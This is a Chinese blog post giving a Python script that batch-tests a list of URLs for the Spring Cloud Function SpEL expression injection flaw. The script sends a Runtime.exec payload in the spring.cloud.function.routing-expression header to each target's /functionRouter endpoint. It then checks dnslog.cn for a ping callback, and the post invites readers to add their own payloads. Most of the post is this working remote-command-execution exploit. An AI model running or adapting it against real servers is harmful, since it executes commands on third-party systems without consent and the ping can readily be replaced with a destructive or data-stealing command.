Spring Cloud Function SpEL表达式注入漏洞批量检测脚本_javafx判断spring cloud function spel漏洞是否存在-优快云博客

本文链接：https://blog.youkuaiyun.com/weixin_48170459/article/details/123842120

本文介绍了一种使用Python脚本结合ping命令来检测特定URL文件中列出的主机是否存在潜在的安全漏洞的方法。通过向目标主机发送包含特殊payload的请求，并监听DNS记录的变化来判断目标系统是否执行了该payload。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

仅可检测出网和ping命令可执行主机，可根据需求自行添加路由字典和加密payload

import requests
url="http://dnslog.cn/getdomain.php"
url1="http://dnslog.cn/getrecords.php"
file=input("请输入url文件保存路径：");#"C:\\Users\\ASUS\\Desktop\\ces1.txt";
with open(file,"r") as file1:
    for i in file1.readlines():
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"};
        header['Host']="dnslog.cn"
        header2 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"};
        request=requests.get(url,headers=header)
        if request.status_code != 200:
            print("dnslog连接失败，当前位置为"+i);
            exit(0);
        cookie=request.headers["Set-Cookie"]
        respone=request.content.decode("utf-8")
        he="T(java.lang.Runtime).getRuntime().exec(\"ping "+respone+"\")";
        header2["spring.cloud.function.routing-expression"] =he;
        data='aaa';
        url3=i.strip('\n');
        agreement=url3.split("://")[0];
        website=url3.split("://")[1].split("/")[0];
        url3=agreement+"://"+website+'/functionRouter';
        header2["Host"]=website;
        try:
            request1 = requests.post(url3, data=data,headers=header2,timeout=3);
        except:
            print(url3+"连接失败");
            continue;
        header["Cookie"]=cookie;
        request1=requests.get(url1,headers=header)
        if request1.status_code != 200:
            print("dnslog连接失败，当前位置为"+i);
            exit(0);
        if request1.content.decode("utf-8")!="[]":
            print(url3+"存在漏洞");